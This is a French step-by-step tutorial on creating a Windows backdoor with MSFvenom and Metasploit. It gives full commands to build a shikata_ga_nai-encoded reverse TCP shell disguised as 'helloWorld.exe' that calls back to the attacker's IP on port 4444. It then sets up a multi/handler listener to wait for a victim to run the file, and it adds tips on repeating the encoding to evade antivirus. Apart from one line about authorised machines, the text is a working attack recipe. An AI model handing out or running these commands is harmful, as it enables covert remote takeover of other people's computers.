Une porte dérobée est utilisée pour contourner les mécanismes de sécurité, souvent secrètement et le plus souvent de manière indétectable. En utilisant MSFvenom, la combinaison de msfpayload et msfencode, il est possible de créer une porte dérobée qui se reconnecte à l'attaquant en utilisant le reverse shell TCP. Afin de développer une porte dérobée, vous devez modifier la signature de votre malware pour échapper à tout logiciel antivirus. Terminez ce projet sur une paire d'ordinateurs auxquels vous êtes autorisé à accéder, et dans le processus, vous en apprendrez plus sur la sécurité informatique et le fonctionnement de ce type de porte dérobée.
Pas
Étape 1. Démarrez Kali et lancez la console Terminal
Étape 2. Tapez ifconfig pour afficher l'interface et vérifier votre adresse IP
Étape 3. Tapez msfvenom -l encoders pour afficher la liste des encodeurs
Vous utiliserez x86/shikata_ga_nai comme encodeur
Étape 4. Tapez "msfvenom -a x86 --platform windows -p windows/shell/reverse_tcp LHOST = 192.168.48.129 LPORT=4444 -b "\x00" -e x86/shikata_ga_nai -f exe > helloWorld.exe
- -a x86 --platform windows désigne l'architecture à utiliser.
- -p windows/shell/reverse_tcp désigne les charges utiles à intégrer.
- LHOST désigne l'adresse IP de l'auditeur.
- LPORT désigne le port d'écoute.
- -b "\x00" désigne pour éviter les mauvais caractères (octets nuls).
- -e x86/shikata_ga_nai désigne le nom des encodeurs.
- -f exe > helloWorld.exe désigne le format de sortie.
Étape 5. Tapez msfconsole pour activer le Metasploit
Vous avez maintenant généré votre porte dérobée. Lorsque la victime clique sur helloWorld.exe, la charge utile du shell qui est intégrée sera activée et établira une connexion avec votre système. Pour recevoir la connexion, vous devez ouvrir le multi-handler dans Metasploit et définir les payloads
Étape 6. Tapez use exploit/multi/handler
Étape 7. Tapez set payload windows/shell/reverse_tcp
Étape 8. Tapez show options pour vérifier le module
Étape 9. Tapez set LHOST 192.168.48.129
"LHOST" désigne l'adresse IP de l'auditeur
Étape 10. Tapez set LPORT 4444
"LPORT" désigne le port d'écoute
Étape 11. Tapez run et attendez la connexion de la machine de la victime
Étape 12. Attendez que la victime clique sur helloWorld.exe
Ensuite, vous serez connecté avec succès à la machine de la victime.
Des astuces
- L'utilisation de -i dans MSFvenom représentera les itérations de l'encodage. Parfois, plusieurs itérations peuvent aider à échapper au logiciel AV.
- Vous avez appris à générer la porte dérobée et à l'encoder en utilisant MSFvenom, mais cette méthode ne fonctionnera pas parfaitement avec certains logiciels AV de nos jours. La raison derrière cela est à cause des modèles d'exécution dans MSFvenom. Les fournisseurs AV ont ajouté la signature statique de ces modèles et les recherchent simplement. La solution à ce problème consiste à utiliser un modèle d'exécution différent ou des outils différents.